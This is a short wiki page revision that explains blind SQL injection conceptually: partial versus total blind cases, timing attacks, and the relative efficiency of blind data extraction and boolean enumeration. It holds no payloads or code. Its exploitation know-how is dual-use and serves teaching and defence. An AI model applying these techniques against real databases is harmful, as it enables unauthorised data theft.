Difference between revisions of "SQL injection/Blind"
(Created page with "There are primarily two types of blind sql injection vulnerabilities: partial blind and total blind. Partial blind injection is referred to as ''partial'' ...") |
(No difference)
|
Revision as of 01:41, 20 November 2012
There are primarily two types of blind sql injection vulnerabilities: partial blind and total blind.
Partial blind injection is referred to as partial because data returned by the application changes to some extent. This may mean it simply does not display in one instance while it displays in the other.
In the situation of a total blind vulnerability or a completely blind vulnerability, the data does not change in any way regardless of the request, thus timing attacks must be utilized for successful exploitation because they affect the HTTP response time rather than the HTTP response data.
There are traditionally two types of exploitation for blind sql injection:
- Blind data extraction
- Boolean enumeration
Each exploitation method has viable options for both partial blind and total blind injection. Blind data extraction is by far faster than boolean enumeration. When using boolean enumeration for exploitation of sql injection, an attacker is able to receive only one bit of data per request. With printable text characters this usually requires 7 requests (because the highest order bit is never set in latin1 printable characters), however this will require up to 8 requests for binary data. In comparison, blind extraction can be used to retrieve values exceeding a full byte per request.